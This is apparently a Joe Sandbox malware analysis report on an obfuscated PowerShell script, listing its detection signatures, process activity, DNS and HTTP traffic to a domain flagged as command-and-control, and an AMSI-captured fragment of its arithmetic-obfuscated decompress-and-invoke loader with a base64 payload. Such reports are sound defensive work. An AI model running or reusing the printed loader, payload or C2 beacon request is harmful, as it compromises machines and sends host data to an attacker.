Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579000
MD5:15c696b54fec704854a06052972d8da1
SHA1:ed686be71d4fd74a17b80d566d6d2303704ead3f
SHA256:54b46f36f001fa7f35af7bd1deaa1b835a3145b18feb98f2584c08220c2dc988
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 4948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4948, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4948, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-20T17:40:36.910647+010028593911Domain Observed Used for C2 Detected192.168.11.20607311.1.1.153UDP

Click to jump to signature section

Show All Signature Results
Source: Binary string: lib.pdbI source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb] source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32rogram Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BRfaul/ source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F02F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55123452403.000001A8EFB6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?t.Automation.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@ source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:60731 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$a4j1wlqhkmzgpot67gw9l3qf0madz/$zs0pgc72wrmfea1.php?id=$env:computername&key=$frnyclkgbjpa&s=
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527p
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFB9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.55127045448.000001A8EFF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.55125120725.000001A8EFDE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.coS
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzE
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzE
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8D4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrS
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzE
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D9F46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D92E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D939D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: classification engineClassification label: mal64.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1o0wgpw.1by.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $rleh0swqxu8v617.(([system.String]::new(@((466387/(39594168/5688)),(-5580+(8629-(4098510/1395))),(-9468+(22541740/2353)),(4595-4474),(846636/10079),(74814/674)))))( $8o670ckbwifesz9 ) $rleh0swqxu8v617.(([char[]]@((4063-3996),(274212/(24607988/(43313548/(40167372/8988)))),(9863-(11607-1855)),(8285-8170),(8900-(-632+(70543880/(506+6974))))) -join ''))()$ko9qcp4ehnibsyw.(([system.String]::new(@((1291-1224),(180-(390456/(40867728/7536))),(-8193+8304),(9966-(2491+(4820+2540))),(4716-(7490-(13578625/(21291284/(14293-(22446790/2294))))))))))()[byte[]] $o5ilj12fkps9y0b = $8o670ckbwifesz9.(([char[]]@((-8403+(7023+1464)),(3908-(3232+(3034-2469))),(-3452+(1502+(-7240+9255))),(-572+686),(673398/5907),(3073-(17844096/5996)),(37+(7393-7309))) -join ''))() $yvoshkgni4d5ajl=$o5ilj12fkps9y0b return $yvoshkgni4d5ajl}[System.Text.Encoding]::ascii.(([char[]]@((73982/1042),(-1220+1321),(-257+(-8994+(7449+1918))),(3005-(1457+(2364510/1614))),(-3149+3265),(-5438+5552),(2545-(-3255+5695)),(1005620/9142),(1010533/9811)) -join ''))((m0x37uqa16toeih8ljnvspyz9rb "Lup+bHdzbWZgctTxbA5qOwX1wkWkjRgKAdpFBcCJERk8YsuqF/rdgHWCKEhoUdmCoEn/ThL53wK9jJYT71tLeB76Rl89Ca7+t1Kry7jaF1nOGMfSxuSLF4OXgYS1g6C9Fs4okAOPmYvH+e61zpGGBIgFEpSemJCvyKizlaKNgLPn0V4Fx84o8uvt0FsayoTlzLSK81iMEZeGl5LBzIRBO7AkwjmJnBZVR8iNt46qqLWXv48l6oyaJ+0xhN3LxAoEFC6thCrYUIIB6SplAo7+TTmoc9qP11QxLip4H5rCgIr73c9HpLF9015eIl/R2G7XQgQYUYQ0U1bjrg1hH/3QivUtm5rSl7wdnt67zYJaVFFyYIP+RGaLScGxOIsuXwNEK93gNwz8uBeznBtiBE/XnE3MjcupyzxVR9opWgjK1ZqTkeq5yA758po8w1BbHcdXCFzIkJmbElDbnA9dhkPD+JEepbpcdmfewL0FhNapLrDyj8VH5OQf9zQAHmy9qRYML1TCpUzs2ZyOKgQIbF+MiqqRHrDfCNQH38Se9QUY8HOO9Qd5o/7NYzIMQ1NBxc0CpoPk1VFOzpVFvUcSirXqFYDHQLihy2zRSW4rF0Z0ojeh5pKuCLSUCkHMIprF3x6vVooitZE8gKqf/6AGei4HQtoZINedTr6A95sOQVpfUI+2zz1dxHsDPk61XYGEn3E51w3B8cC8UTuwSHMLk7nc6KjF2l4xzRcNHsDGkUvhMFLglt96ojxeqruoDocEDnZ8SvxbTyEYo+vnO9Cu8YfxtgqcpOilZ4TouUM2EQdWOxj7gC0wGNqrTf+UMx3/CJK/z4P8ok41W/Q/G0Z5qilu1tKF/6EDSOK07bMlQ2Gv5D2xnr4rpw2n9X+QN3NiN7aduDypEQacuP3DJV7N6sLdp6CIsKk7roLNrg6SlRGtkta9HGLxDZaQG+scw9fTkOzyVQx+Av5dHdjfLU5VLlzIUIiaiYqd4T6lb385Y44XIbOVtLsLwZ7G+CW4A7z2N5WAjSxXeUoZS7AcJhvmrBG8amgp9i6owxyZp52F6dcVhjtDHcNNFiPFwZbE3Jey4kMD0Omn6UKIhYB+GJwcNS3atmIFRul3CskTRdhJEokTno2jbKAc0sJ5qM3L5ZGgKp+iuO8oL6bCnWoIcR6HIsBHh0Y79zadLbMggJ1vmwoPEZCOkU6Mc7CNOnTbjDtuToz2WpCy/AebixOdraiP6qZZcyrOFt5R1oeFJi6hn6gPccdJWseX31o3GHLieeBagdr6GXIfMgFwCAXUSrLfiEhgC6/oLv/3KXjdKDPiPk+fJ1huU9KNnbh+c79uMmAmg+iOCHopD3rNQV9ACQ5EIC8mQMNHyvhIn6GeiDS9Fyp2sWrZAYe0Z2SG/LoPWdH9R+tgzcl/aNvS6Lsed/oF8S7vdVEdXvhNFDvkGYexAsBqXZKjTXu/7t+MhaKmk6OZHddErv9JlZmYwqmTHX22iMR2/Ru6EebuwVy/XX6QJCMwRz99u4NYminHHJyz4HvL8oghQ1TYUGGpsR48z+IXJJPkML1wHVCx2+wfwH9KjS3NuWxHX7Qf6kiuzQEdolOIHgE5BjmhXdI9e6c9YiFfr/s9o5f2RriKP5P6PhTmzec2xAVPyfyv0XUKpH3JhmQ0Kg3AEIWHaLaa2HJZU+uguXGA85xqKaegH89C0Harf8++4/Y0fGiwQDAJp+ovehLeZMAt3UhdrpcL/+ybfIlJ7iWpsPk3aioHLTpFubuOzYInYzczuNdAI2k8Lnf93k3g1pzYaqExaC7oTny9nAhwsVwXc/Yutk3E/6FecZf7DFTj+2J13Z57zN3Y29Biieb4bwogC4+cAUCVN+X/GPLpajl8+1RNf81
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
